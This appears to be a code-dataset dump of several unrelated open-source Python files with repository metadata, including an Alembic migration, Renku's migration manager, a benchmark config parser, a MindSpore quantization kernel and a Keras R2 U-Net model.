1,394
py
Python
web_console_v2/api/migrations/versions/1c9f8c908061_initial_migration.py
zhenv5/fedlearner
a8ff0eaef48e174d432a40d23d12c1f57e842ebd
[ "Apache-2.0" ]
null
null
null
web_console_v2/api/migrations/versions/1c9f8c908061_initial_migration.py
zhenv5/fedlearner
a8ff0eaef48e174d432a40d23d12c1f57e842ebd
[ "Apache-2.0" ]
null
null
null
web_console_v2/api/migrations/versions/1c9f8c908061_initial_migration.py
zhenv5/fedlearner
a8ff0eaef48e174d432a40d23d12c1f57e842ebd
[ "Apache-2.0" ]
null
null
null
"""Initial migration. Revision ID: 1c9f8c908061 Revises: Create Date: 2020-11-25 16:57:46.699205 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = '1c9f8c908061' down_revision = None branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('projects_v2', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=255), nullable=True), sa.Column('config', sa.Text(), nullable=True), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_projects_v2_name'), 'projects_v2', ['name'], unique=False) op.create_table('users_v2', sa.Column('id', sa.Integer(), nullable=False), sa.Column('username', sa.String(length=255), nullable=True), sa.Column('password', sa.String(length=255), nullable=True), sa.PrimaryKeyConstraint('id') ) op.create_index(op.f('ix_users_v2_username'), 'users_v2', ['username'], unique=False) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_index(op.f('ix_users_v2_username'), table_name='users_v2') op.drop_table('users_v2') op.drop_index(op.f('ix_projects_v2_name'), table_name='projects_v2') op.drop_table('projects_v2') # ### end Alembic commands ###
30.977778
89
0.685079
795aa95db417c81433e90c183d0f6c2be14c92cc
12,143
py
Python
renku/core/management/migrate.py
TaoSunVoyage/renku-python
858fe84ce2925a49d9b62638dc601f581e24353e
[ "Apache-2.0" ]
null
null
null
renku/core/management/migrate.py
TaoSunVoyage/renku-python
858fe84ce2925a49d9b62638dc601f581e24353e
[ "Apache-2.0" ]
null
null
null
renku/core/management/migrate.py
TaoSunVoyage/renku-python
858fe84ce2925a49d9b62638dc601f581e24353e
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright 2017-2021 - Swiss Data Science Center (SDSC) # A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and # Eidgenössische Technische Hochschule Zürich (ETHZ). # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Renku migrations management. Migrations files are put in renku/core/management/migrations directory. Name of these files has m_1234__name.py format where 1234 is the migration version and name can be any alphanumeric and underscore combination. Migration files are sorted based on their lowercase name. Each migration file must define a public "migrate" function that accepts a client as its argument. When executing a migration, the migration file is imported as a module and the "migrate" function is executed. Migration version is checked against the Renku project version (in .renku/metadata.yml) and any migration which has a higher version is applied to the project. 
""" import hashlib import importlib import json import os import re import shutil from pathlib import Path import pkg_resources from jinja2 import Template from renku.core.errors import ( DockerfileUpdateError, MigrationError, MigrationRequired, ProjectNotSupported, TemplateUpdateError, ) from renku.core.management.command_builder.command import inject from renku.core.utils import communication from renku.core.utils.migrate import read_project_version SUPPORTED_PROJECT_VERSION = 9 def check_for_migration(): """Checks if migration is required.""" if is_migration_required(): raise MigrationRequired elif is_project_unsupported(): raise ProjectNotSupported def is_migration_required(): """Check if project requires migration.""" return is_renku_project() and _get_project_version() < SUPPORTED_PROJECT_VERSION def is_project_unsupported(): """Check if this version of Renku cannot work with the project.""" return is_renku_project() and _get_project_version() > SUPPORTED_PROJECT_VERSION def is_template_update_possible(): """Check if the project can be updated to a newer version of the project template.""" return _update_template(check_only=True) def is_docker_update_possible(): """Check if the Dockerfile can be updated to a new version of renku-python.""" return _update_dockerfile(check_only=True) @inject.params(client="LocalClient") def migrate( client, force_template_update=False, skip_template_update=False, skip_docker_update=False, skip_migrations=False, project_version=None, max_version=None, ): """Apply all migration files to the project.""" template_updated = docker_updated = False if not is_renku_project(): return False, template_updated, docker_updated if ( not skip_template_update and client.project.template_source and (force_template_update or client.project.automated_update) ): try: template_updated, _, _ = _update_template() except TemplateUpdateError: raise except (Exception, BaseException) as e: raise TemplateUpdateError("Couldn't update from template.") from 
e if not skip_docker_update: try: docker_updated = _update_dockerfile() except DockerfileUpdateError: raise except (Exception, BaseException) as e: raise DockerfileUpdateError("Couldn't update renku version in Dockerfile.") from e if skip_migrations: return False, template_updated, docker_updated project_version = project_version or _get_project_version() n_migrations_executed = 0 version = 1 for version, path in get_migrations(): if max_version and version > max_version: break if version > project_version: module = importlib.import_module(path) module_name = module.__name__.split(".")[-1] communication.echo(f"Applying migration {module_name}...") try: module.migrate(client) except (Exception, BaseException) as e: raise MigrationError("Couldn't execute migration") from e n_migrations_executed += 1 if n_migrations_executed > 0 and not client.is_using_temporary_datasets_path(): client._project = None # NOTE: force reloading of project metadata client.project.version = str(version) client.project.to_yaml() communication.echo(f"Successfully applied {n_migrations_executed} migrations.") return n_migrations_executed != 0, template_updated, docker_updated @inject.params(client="LocalClient") def _update_template(client, check_only=False): """Update local files from the remote template.""" from renku.core.commands.init import fetch_template project = client.project if not project.template_version: return False, None, None template_manifest, template_folder, template_source, template_version = fetch_template( project.template_source, project.template_ref ) if template_source == "renku": template_version = pkg_resources.parse_version(template_version) current_version = pkg_resources.parse_version(project.template_version) if template_version <= current_version: return False, project.template_version, current_version else: if template_version == project.template_version: return False, project.template_version, template_version if check_only: return True, 
project.template_version, template_version communication.echo("Updating project from template...") template_filtered = [ template_elem for template_elem in template_manifest if template_elem["folder"] == project.template_id ] if len(template_filtered) == 1: template_data = template_filtered[0] else: raise TemplateUpdateError(f'The template with id "{project.template_id}" is not available.') template_path = template_folder / template_data["folder"] metadata = json.loads(project.template_metadata) template_variables = set(template_data.get("variables", {}).keys()) metadata_keys = set(metadata.keys()) missing_keys = ", ".join(template_variables - metadata_keys) if missing_keys: raise TemplateUpdateError( f"Can't update template, it now requires variable(s) {missing_keys} which were not present on project " "creation." ) if not os.path.exists(client.template_checksums): raise TemplateUpdateError("Can't update template as there are no template checksums set on the project.") with open(client.template_checksums, "r") as checksum_file: checksums = json.load(checksum_file) updated_files = [] for file in template_path.glob("**/*"): rel_path = file.relative_to(template_path) destination = client.path / rel_path # NOTE: the path could contain template variables, we need to template it destination = Path(Template(str(destination)).render(metadata)) try: # parse file and process it template = Template(file.read_text()) rendered_content = template.render(metadata) sha256_hash = hashlib.sha256() content_bytes = rendered_content.encode("utf-8") blocksize = 4096 blocks = (len(content_bytes) - 1) // blocksize + 1 for i in range(blocks): byte_block = content_bytes[i * blocksize : (i + 1) * blocksize] sha256_hash.update(byte_block) new_template_hash = sha256_hash.hexdigest() if not destination.exists() and str(rel_path) not in checksums: # NOTE: new file in template local_changes = False remote_changes = True else: current_hash = None # NOTE: None if user deleted file locally if 
destination.exists(): current_hash = client._content_hash(destination) local_changes = str(rel_path) not in checksums or current_hash != checksums[str(rel_path)] remote_changes = str(rel_path) not in checksums or new_template_hash != checksums[str(rel_path)] if local_changes: if remote_changes and str(rel_path) in project.immutable_template_files: # NOTE: There are local changes in a file that should not be changed by users, # and the file was updated in the template as well. So the template can't be updated. raise TemplateUpdateError( f"Can't update template as immutable template file {rel_path} has local changes." ) continue elif not remote_changes: continue destination.write_text(rendered_content) except IsADirectoryError: destination.mkdir(parents=True, exist_ok=True) except TypeError: shutil.copy(file, destination) updated = "\n".join(updated_files) communication.echo(f"Updated project from template, updated files:\n{updated}") project.template_version = template_version project.to_yaml() return True, project.template_version, template_version @inject.params(client="LocalClient") def _update_dockerfile(client, check_only=False): """Update the dockerfile to the newest version of renku.""" from renku import __version__ if not client.docker_path.exists(): return False communication.echo("Updating dockerfile...") with open(client.docker_path, "r") as f: dockercontent = f.read() current_version = pkg_resources.parse_version(__version__) m = re.search(r"^ARG RENKU_VERSION=(\d+\.\d+\.\d+)$", dockercontent, flags=re.MULTILINE) if not m: if check_only: return False raise DockerfileUpdateError( "Couldn't update renku-python version in Dockerfile, as it doesn't contain an 'ARG RENKU_VERSION=...' line." 
) docker_version = pkg_resources.parse_version(m.group(1)) if docker_version >= current_version: return False if check_only: return True dockercontent = re.sub( r"^ARG RENKU_VERSION=\d+\.\d+\.\d+$", f"ARG RENKU_VERSION={__version__}", dockercontent, flags=re.MULTILINE ) with open(client.docker_path, "w") as f: f.write(dockercontent) communication.echo("Updated dockerfile.") return True @inject.params(client="LocalClient") def _get_project_version(client): try: return int(read_project_version(client)) except ValueError: return 1 @inject.params(client="LocalClient") def is_renku_project(client): """Check if repository is a renku project.""" try: return client.project is not None except ValueError: # Error in loading due to an older schema return client.renku_metadata_path.exists() def get_migrations(): """Return a sorted list of versions and migration modules.""" migrations = [] for file_ in pkg_resources.resource_listdir("renku.core.management", "migrations"): match = re.search(r"m_([0-9]{4})__[a-zA-Z0-9_-]*.py", file_) if match is None: # migration files match m_0000__[name].py format continue version = int(match.groups()[0]) path = "renku.core.management.migrations.{}".format(Path(file_).stem) migrations.append((version, path)) migrations = sorted(migrations, key=lambda v: v[1].lower()) return migrations
35.926036
120
0.688627
795aab1b23393cb1ec478a592131034f8ce34e08
1,946
py
Python
benchmarks/perf-tool/okpt/io/config/parsers/base.py
martin-gaievski/k-NN
77353512c1f15e0dc996428a982941a7ee3036fb
[ "Apache-2.0" ]
44
2021-04-20T18:06:56.000Z
2022-03-31T00:59:07.000Z
benchmarks/perf-tool/okpt/io/config/parsers/base.py
martin-gaievski/k-NN
77353512c1f15e0dc996428a982941a7ee3036fb
[ "Apache-2.0" ]
227
2021-04-21T12:21:46.000Z
2022-03-31T22:43:04.000Z
benchmarks/perf-tool/okpt/io/config/parsers/base.py
martin-gaievski/k-NN
77353512c1f15e0dc996428a982941a7ee3036fb
[ "Apache-2.0" ]
31
2021-04-21T02:18:09.000Z
2022-03-25T23:47:17.000Z
# SPDX-License-Identifier: Apache-2.0 # # The OpenSearch Contributors require contributions made to # this file be licensed under the Apache-2.0 license or a # compatible open source license. """Base Parser class. Classes: BaseParser: Base class for config parsers. Exceptions: ConfigurationError: An error in the configuration syntax. """ import os from io import TextIOWrapper import cerberus from okpt.io.utils import reader class ConfigurationError(Exception): """Exception raised for errors in the tool configuration. Attributes: message -- explanation of the error """ def __init__(self, message: str): self.message = f'{message}' super().__init__(self.message) def _get_validator_from_schema_name(schema_name: str): """Get the corresponding Cerberus validator from a schema name.""" curr_file_dir = os.path.dirname(os.path.abspath(__file__)) schemas_dir = os.path.join(os.path.dirname(curr_file_dir), 'schemas') schema_file_path = os.path.join(schemas_dir, f'{schema_name}.yml') schema_obj = reader.parse_yaml_from_path(schema_file_path) return cerberus.Validator(schema_obj) class BaseParser: """Base class for config parsers. Attributes: validator: Cerberus validator for a particular schema errors: Cerberus validation errors (if any are found during validation) Methods: parse: Parse config. """ def __init__(self, schema_name: str): self.validator = _get_validator_from_schema_name(schema_name) self.errors = '' def parse(self, file_obj: TextIOWrapper): """Convert file object to dict, while validating against config schema.""" config_obj = reader.parse_yaml(file_obj) is_config_valid = self.validator.validate(config_obj) if not is_config_valid: raise ConfigurationError(self.validator.errors) return self.validator.document
28.617647
82
0.715827
795aab52a3db8a7f3584a0057803cac3eb701128
7,417
py
Python
mindspore/ops/_op_impl/_custom_op/fake_quant_perchannel_grad.py
i4oolish/mindspore
dac3be31d0f2c0a3516200f47af30980e566601b
[ "Apache-2.0" ]
2
2020-08-12T16:14:40.000Z
2020-12-04T03:05:57.000Z
mindspore/ops/_op_impl/_custom_op/fake_quant_perchannel_grad.py
dilingsong/mindspore
4276050f2494cfbf8682560a1647576f859991e8
[ "Apache-2.0" ]
null
null
null
mindspore/ops/_op_impl/_custom_op/fake_quant_perchannel_grad.py
dilingsong/mindspore
4276050f2494cfbf8682560a1647576f859991e8
[ "Apache-2.0" ]
null
null
null
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """FakeQuantPerChannelGrad op""" import te.lang.cce from te import tvm from te.platform.fusion_manager import fusion_manager from topi import generic from topi.cce import util from mindspore.ops.op_info_register import op_info_register, TBERegOp, DataType SHAPE_SIZE_LIMIT = 2147483648 D_TYPE = 'float32' fake_quant_perchannel_grad_op_info = TBERegOp("FakeQuantPerChannelGrad") \ .fusion_type("OPAQUE") \ .async_flag(False) \ .binfile_name("fake_quant_perchannel_grad.so") \ .compute_cost(10) \ .kernel_name("fake_quant_perchannel_grad") \ .partial_flag(True) \ .attr("symmetric", "optional", "bool", "all") \ .attr("narrow_range", "optional", "bool", "all") \ .attr("num_bits", "optional", "int", "all") \ .attr("channel_axis", "optional", "int", "all") \ .input(0, "dout", None, "required", None) \ .input(1, "x", None, "required", None) \ .input(2, "min", None, "required", None) \ .input(3, "max", None, "required", None) \ .output(0, "dx", True, "required", "all") \ .dtype_format(DataType.F16_Default, DataType.F16_Default, DataType.F16_Default, DataType.F16_Default, DataType.F16_Default) \ .dtype_format(DataType.F16_5HD, DataType.F16_5HD, DataType.F16_5HD, DataType.F16_5HD, DataType.F16_5HD) \ .dtype_format(DataType.F32_Default, DataType.F32_Default, DataType.F32_Default, DataType.F32_Default, DataType.F32_Default) \ 
.dtype_format(DataType.F32_5HD, DataType.F32_5HD, DataType.F32_5HD, DataType.F32_5HD, DataType.F32_5HD) \ .get_op_info() def _less_compare_float32(data_x, data_y): """_less_compare_float32 compute""" input_shape = te.lang.cce.util.shape_to_list(data_x.shape) min_value = tvm.const(2 ** (-126), dtype=D_TYPE) max_value = tvm.const(2 ** 62, dtype=D_TYPE) factor_value = tvm.const(2 ** 2, dtype=D_TYPE) data_zero = te.lang.cce.broadcast( tvm.const(0, dtype=D_TYPE), input_shape, D_TYPE) min_value_tensor = te.lang.cce.vadds(data_zero, min_value) res_sub = te.lang.cce.vsub(data_y, data_x) res_min = te.lang.cce.vmin(res_sub, min_value_tensor) res_max = te.lang.cce.vmax(res_min, data_zero) res_max_mul = te.lang.cce.vmuls(res_max, max_value) res_max_mul_max = te.lang.cce.vmuls(res_max_mul, max_value) res = te.lang.cce.vmuls(res_max_mul_max, factor_value) return res @op_info_register(fake_quant_perchannel_grad_op_info) def _fake_quant_perchannel_grad_tbe(): """FakeQuantPerChannelGrad TBE register""" return @fusion_manager.register("fake_quant_perchannel_grad") def fake_quant_perchannel_grad_compute(dout, x, min_val, max_val, quant_min, quant_max, kernel_name="fake_quant_perchannel_grad"): """FakeQuantPerChannelGrad""" x_shape = te.lang.cce.util.shape_to_list(x.shape) minmax_shape = te.lang.cce.util.shape_to_list(min_val.shape) quant_min = tvm.const(quant_min, x.dtype) quant_max = tvm.const(quant_max, x.dtype) quant_min = te.lang.cce.broadcast(quant_min, minmax_shape, x.dtype) quant_max = te.lang.cce.broadcast(quant_max, minmax_shape, x.dtype) # CalNudge(NudgeMinMax) scale = te.lang.cce.vdiv(te.lang.cce.vsub( max_val, min_val), te.lang.cce.vsub(quant_max, quant_min)) zp_from_min = te.lang.cce.vsub(quant_min, te.lang.cce.vdiv(min_val, scale)) # Nudge zero point nudge_zp_ = te.lang.cce.vmin( quant_max, te.lang.cce.vmax(quant_min, zp_from_min)) nudge_zp = te.lang.cce.floor(te.lang.cce.vadds(nudge_zp_, 0.5)) nudge_min = te.lang.cce.vmul(te.lang.cce.vsub(quant_min, nudge_zp), scale) 
nudge_max = te.lang.cce.vmul(te.lang.cce.vsub(quant_max, nudge_zp), scale) # FakeQuant Grad nudge_min_b = te.lang.cce.broadcast(nudge_min, x_shape) nudge_max_b = te.lang.cce.broadcast(nudge_max, x_shape) bool_over_min = _less_compare_float32(nudge_min_b, x) bool_less_max = _less_compare_float32(x, nudge_max_b) bool_between = te.lang.cce.vmul(bool_over_min, bool_less_max) res = te.lang.cce.vmul(dout, bool_between) return res @util.check_input_type(dict, dict, dict, dict, dict, bool, bool, int, int, str) def fake_quant_perchannel_grad(dout, x, min_val, max_val, dx, symmetric, narrow_range, num_bits, channel_axis, kernel_name="fake_quant_perchannel_grad"): """FakeQuantPerChannelGrad""" x_shape = x.get("shape") x_shape_ = x.get("ori_shape") x_format = x.get("format") x_dtype = x.get("dtype") min_shape = min_val.get("ori_shape") min_dtype = min_val.get("dtype") max_shape = max_val.get("ori_shape") max_dtype = max_val.get("dtype") # for Dense weight quant, 2d[co,ci] -> 4d[1,co,ci,1], channel_axis_ need change to 1. 
if channel_axis == 0 and x_shape_[0] != min_shape[0] and x_shape_[1] == min_shape[0]: channel_axis_ = 1 else: channel_axis_ = channel_axis util.check_kernel_name(kernel_name) util.check_shape_rule(x_shape) util.check_shape_rule(min_shape, 1, 1, x_shape_[channel_axis_]) util.check_shape_rule(max_shape, 1, 1, x_shape_[channel_axis_]) util.check_tensor_shape_size(x_shape) util.check_tensor_shape_size(min_shape) util.check_tensor_shape_size(max_shape) check_list = ["float32", "float16"] x_dtype = x_dtype.lower() min_dtype = min_dtype.lower() max_dtype = max_dtype.lower() util.check_dtype_rule(x_dtype, check_list) util.check_dtype_rule(min_dtype, check_list) util.check_dtype_rule(max_dtype, check_list) if symmetric: quant_min = 0 - 2 ** (num_bits - 1) quant_max = 2 ** (num_bits - 1) - 1 else: quant_min = 0 quant_max = 2 ** num_bits - 1 if narrow_range: quant_min = quant_min + 1 shape_c = [1] * len(x_shape) shape_c[channel_axis_] = min_val.get("ori_shape")[0] if x_format == "NC1HWC0" and channel_axis_ == 1: shape_c = min_val.get("shape") dout_data = tvm.placeholder(x_shape, name="dout", dtype=x_dtype) input_data = tvm.placeholder(x_shape, name="x", dtype=x_dtype) min_data = tvm.placeholder(shape_c, name="min_val", dtype=x_dtype) max_data = tvm.placeholder(shape_c, name="max_val", dtype=x_dtype) res = fake_quant_perchannel_grad_compute(dout_data, input_data, min_data, max_data, quant_min, quant_max, kernel_name) with tvm.target.cce(): sch = generic.auto_schedule(res) tensor_list = [dout_data, input_data, min_data, max_data, res] config = {"print_ir": False, "name": kernel_name, "tensor_list": tensor_list} te.lang.cce.cce_build_code(sch, config)
41.903955
109
0.687205
795aabe00048f14b4cc81151100147c494a5b0cc
272
py
Python
rama_aluminium/config/serial_no_dashboard.py
ashish-greycube/rama_aluminium
0eb1d39a16e79bb8a1a3e7c5b62252b916dad2ad
[ "MIT" ]
null
null
null
rama_aluminium/config/serial_no_dashboard.py
ashish-greycube/rama_aluminium
0eb1d39a16e79bb8a1a3e7c5b62252b916dad2ad
[ "MIT" ]
null
null
null
rama_aluminium/config/serial_no_dashboard.py
ashish-greycube/rama_aluminium
0eb1d39a16e79bb8a1a3e7c5b62252b916dad2ad
[ "MIT" ]
null
null
null
from __future__ import unicode_literals from frappe import _ def get_data(data): return { 'fieldname': 'serial_no', 'non_standard_fieldnames': { 'Daily Press':'die' }, 'transactions': [ { 'items': ['Daily Press'] }, ] }
18.133333
39
0.569853
795aac98c56bff148027a0c082fc0d1efbe348f7
772
py
Python
exer1/task4.py
farhad200013/machine_learning
9ce27650f677246783e04299b1565d6f2106c3e6
[ "MIT" ]
null
null
null
exer1/task4.py
farhad200013/machine_learning
9ce27650f677246783e04299b1565d6f2106c3e6
[ "MIT" ]
null
null
null
exer1/task4.py
farhad200013/machine_learning
9ce27650f677246783e04299b1565d6f2106c3e6
[ "MIT" ]
1
2020-08-19T20:50:04.000Z
2020-08-19T20:50:04.000Z
# -*- coding: utf-8 -*- """ Created on Thu Jan 12 15:25:14 2017 @author: aliTakin """ # this is task 4 from scipy.io import loadmat import matplotlib.pyplot as plt import numpy as np mat = loadmat(r"C:\Users\aliTakin\Desktop\4.92\sgn_41007\twoClassData.mat") print(mat.keys()) # Which variables mat contains? X = mat["X"] # Collect the two variables. y = mat["y"].ravel() X_zero = X[y==0, :] X_one = X[y==1, :] plt.plot(X_zero[:, 0], X_zero[:, 1], 'ro') plt.plot(X_one[:, 0], X_one[:, 1], 'bo') plt.show() def normalize_data(X): return(X - X.mean(axis = 0)) / X.std(axis = 0) X_norm = normalize_data(X) X_norm = normalize_data(X) print(np.mean(X_norm, axis = 0)) # Should be 0 print(np.std(X_norm, axis = 0)) # Should be 1
20.315789
75
0.61658
795aad7a46b047e0255a38b5330184156872b484
11,903
py
Python
swiss_army_keras/_model_r2_unet_2d.py
desmoteo/swiss-army-keras
811d5991cb6d7d9808e57617a24b501479a78b86
[ "MIT" ]
1
2022-02-23T13:54:22.000Z
2022-02-23T13:54:22.000Z
swiss_army_keras/_model_r2_unet_2d.py
waterviewsrl/swiss-army-keras
49578f1a45761229756a8adbfcf692728039dc3b
[ "MIT" ]
null
null
null
swiss_army_keras/_model_r2_unet_2d.py
waterviewsrl/swiss-army-keras
49578f1a45761229756a8adbfcf692728039dc3b
[ "MIT" ]
null
null
null
from __future__ import absolute_import from swiss_army_keras.layer_utils import * from swiss_army_keras.activations import GELU, Snake from tensorflow.keras.layers import Input from tensorflow.keras.models import Model def RR_CONV(X, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', batch_norm=False, name='rr'): ''' Recurrent convolutional layers with skip connection. RR_CONV(X, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', batch_norm=False, name='rr') Input ---------- X: input tensor. channel: number of convolution filters. kernel_size: size of 2-d convolution kernels. stack_num: number of stacked recurrent convolutional layers. recur_num: number of recurrent iterations. activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interfaces, e.g., 'ReLU'. batch_norm: True for batch normalization, False otherwise. name: prefix of the created keras layers. Output ---------- X: output tensor. ''' activation_func = eval(activation) layer_skip = Conv2D(channel, 1, name='{}_conv'.format(name))(X) layer_main = layer_skip for i in range(stack_num): layer_res = Conv2D(channel, kernel_size, padding='same', name='{}_conv{}'.format(name, i))(layer_main) if batch_norm: layer_res = BatchNormalization(name='{}_bn{}'.format(name, i))(layer_res) layer_res = activation_func(name='{}_activation{}'.format(name, i))(layer_res) for j in range(recur_num): layer_add = add([layer_res, layer_main], name='{}_add{}_{}'.format(name, i, j)) layer_res = Conv2D(channel, kernel_size, padding='same', name='{}_conv{}_{}'.format(name, i, j))(layer_add) if batch_norm: layer_res = BatchNormalization(name='{}_bn{}_{}'.format(name, i, j))(layer_res) layer_res = activation_func(name='{}_activation{}_{}'.format(name, i, j))(layer_res) layer_main = layer_res out_layer = add([layer_main, layer_skip], name='{}_add{}'.format(name, i)) return out_layer def UNET_RR_left(X, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', 
pool=True, batch_norm=False, name='left0'): ''' The encoder block of R2U-Net. UNET_RR_left(X, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', pool=True, batch_norm=False, name='left0') Input ---------- X: input tensor. channel: number of convolution filters. kernel_size: size of 2-d convolution kernels. stack_num: number of stacked recurrent convolutional layers. recur_num: number of recurrent iterations. activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interfaces, e.g., 'ReLU'. pool: True or 'max' for MaxPooling2D. 'ave' for AveragePooling2D. False for strided conv + batch norm + activation. batch_norm: True for batch normalization, False otherwise. name: prefix of the created keras layers. Output ---------- X: output tensor. *downsampling is fixed to 2-by-2, e.g., reducing feature map sizes from 64-by-64 to 32-by-32 ''' pool_size = 2 # maxpooling layer vs strided convolutional layers X = encode_layer(X, channel, pool_size, pool, activation=activation, batch_norm=batch_norm, name='{}_encode'.format(name)) # stack linear convolutional layers X = RR_CONV(X, channel, stack_num=stack_num, recur_num=recur_num, activation=activation, batch_norm=batch_norm, name=name) return X def UNET_RR_right(X, X_list, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', unpool=True, batch_norm=False, name='right0'): ''' The decoder block of R2U-Net. UNET_RR_right(X, X_list, channel, kernel_size=3, stack_num=2, recur_num=2, activation='ReLU', unpool=True, batch_norm=False, name='right0') Input ---------- X: input tensor. X_list: a list of other tensors that connected to the input tensor. channel: number of convolution filters. kernel_size: size of 2-d convolution kernels. stack_num: number of stacked recurrent convolutional layers. recur_num: number of recurrent iterations. activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interfaces, e.g., 'ReLU'. 
unpool: True or 'bilinear' for Upsampling2D with bilinear interpolation. 'nearest' for Upsampling2D with nearest interpolation. False for Conv2DTranspose + batch norm + activation. batch_norm: True for batch normalization, False otherwise. name: prefix of the created keras layers. Output ---------- X: output tensor ''' pool_size = 2 X = decode_layer(X, channel, pool_size, unpool, activation=activation, batch_norm=batch_norm, name='{}_decode'.format(name)) # linear convolutional layers before concatenation X = CONV_stack(X, channel, kernel_size, stack_num=1, activation=activation, batch_norm=batch_norm, name='{}_conv_before_concat'.format(name)) # Tensor concatenation H = concatenate([X,]+X_list, axis=-1, name='{}_concat'.format(name)) # stacked linear convolutional layers after concatenation H = RR_CONV(H, channel, stack_num=stack_num, recur_num=recur_num, activation=activation, batch_norm=batch_norm, name=name) return H def r2_unet_2d_base(input_tensor, filter_num, stack_num_down=2, stack_num_up=2, recur_num=2, activation='ReLU', batch_norm=False, pool=True, unpool=True, name='res_unet'): ''' The base of Recurrent Residual (R2) U-Net. r2_unet_2d_base(input_tensor, filter_num, stack_num_down=2, stack_num_up=2, recur_num=2, activation='ReLU', batch_norm=False, pool=True, unpool=True, name='res_unet') ---------- Alom, M.Z., Hasan, M., Yakopcic, C., Taha, T.M. and Asari, V.K., 2018. Recurrent residual convolutional neural network based on u-net (r2u-net) for medical image segmentation. arXiv preprint arXiv:1802.06955. Input ---------- input_tensor: the input tensor of the base, e.g., `keras.layers.Inpyt((None, None, 3))`. filter_num: a list that defines the number of filters for each \ down- and upsampling levels. e.g., `[64, 128, 256, 512]`. The depth is expected as `len(filter_num)`. stack_num_down: number of stacked recurrent convolutional layers per downsampling level/block. 
stack_num_down: number of stacked recurrent convolutional layers per upsampling level/block. recur_num: number of recurrent iterations. activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interfaces, e.g., 'ReLU'. batch_norm: True for batch normalization. pool: True or 'max' for MaxPooling2D. 'ave' for AveragePooling2D. False for strided conv + batch norm + activation. unpool: True or 'bilinear' for Upsampling2D with bilinear interpolation. 'nearest' for Upsampling2D with nearest interpolation. False for Conv2DTranspose + batch norm + activation. name: prefix of the created keras layers. Output ---------- X: output tensor. ''' activation_func = eval(activation) X = input_tensor X_skip = [] # downsampling blocks X = RR_CONV(X, filter_num[0], stack_num=stack_num_down, recur_num=recur_num, activation=activation, batch_norm=batch_norm, name='{}_down0'.format(name)) X_skip.append(X) for i, f in enumerate(filter_num[1:]): X = UNET_RR_left(X, f, kernel_size=3, stack_num=stack_num_down, recur_num=recur_num, activation=activation, pool=pool, batch_norm=batch_norm, name='{}_down{}'.format(name, i+1)) X_skip.append(X) # upsampling blocks X_skip = X_skip[:-1][::-1] for i, f in enumerate(filter_num[:-1][::-1]): X = UNET_RR_right(X, [X_skip[i],], f, stack_num=stack_num_up, recur_num=recur_num, activation=activation, unpool=unpool, batch_norm=batch_norm, name='{}_up{}'.format(name, i+1)) return X def r2_unet_2d(input_size, filter_num, n_labels, stack_num_down=2, stack_num_up=2, recur_num=2, activation='ReLU', output_activation='Softmax', batch_norm=False, pool=True, unpool=True, name='r2_unet'): ''' Recurrent Residual (R2) U-Net r2_unet_2d(input_size, filter_num, n_labels, stack_num_down=2, stack_num_up=2, recur_num=2, activation='ReLU', output_activation='Softmax', batch_norm=False, pool=True, unpool=True, name='r2_unet') ---------- Alom, M.Z., Hasan, M., Yakopcic, C., Taha, T.M. and Asari, V.K., 2018. 
Recurrent residual convolutional neural network based on u-net (r2u-net) for medical image segmentation. arXiv preprint arXiv:1802.06955. Input ---------- input_size: the size/shape of network input, e.g., `(128, 128, 3)`. filter_num: a list that defines the number of filters for each \ down- and upsampling levels. e.g., `[64, 128, 256, 512]`. The depth is expected as `len(filter_num)`. n_labels: number of output labels. stack_num_down: number of stacked recurrent convolutional layers per downsampling level/block. stack_num_down: number of stacked recurrent convolutional layers per upsampling level/block. recur_num: number of recurrent iterations. activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interfaces, e.g., 'ReLU'. output_activation: one of the `tensorflow.keras.layers` or `swiss_army_keras.activations` interface or 'Sigmoid'. Default option is 'Softmax'. if None is received, then linear activation is applied. batch_norm: True for batch normalization. pool: True or 'max' for MaxPooling2D. 'ave' for AveragePooling2D. False for strided conv + batch norm + activation. unpool: True or 'bilinear' for Upsampling2D with bilinear interpolation. 'nearest' for Upsampling2D with nearest interpolation. False for Conv2DTranspose + batch norm + activation. name: prefix of the created keras layers. Output ---------- model: a keras model. ''' activation_func = eval(activation) IN = Input(input_size, name='{}_input'.format(name)) # base X = r2_unet_2d_base(IN, filter_num, stack_num_down=stack_num_down, stack_num_up=stack_num_up, recur_num=recur_num, activation=activation, batch_norm=batch_norm, pool=pool, unpool=unpool, name=name) # output layer OUT = CONV_output(X, n_labels, kernel_size=1, activation=output_activation, name='{}_output'.format(name)) # functional API model model = Model(inputs=[IN], outputs=[OUT], name='{}_model'.format(name)) return model
42.510714
126
0.625305
795ab08eb809edc62b5300b19cfdf01e5bee9c9d
1,024
py
Python
__init__.py
Ryize/it-news
a77f5ba37d665d902f229e6411145050db93e5c9
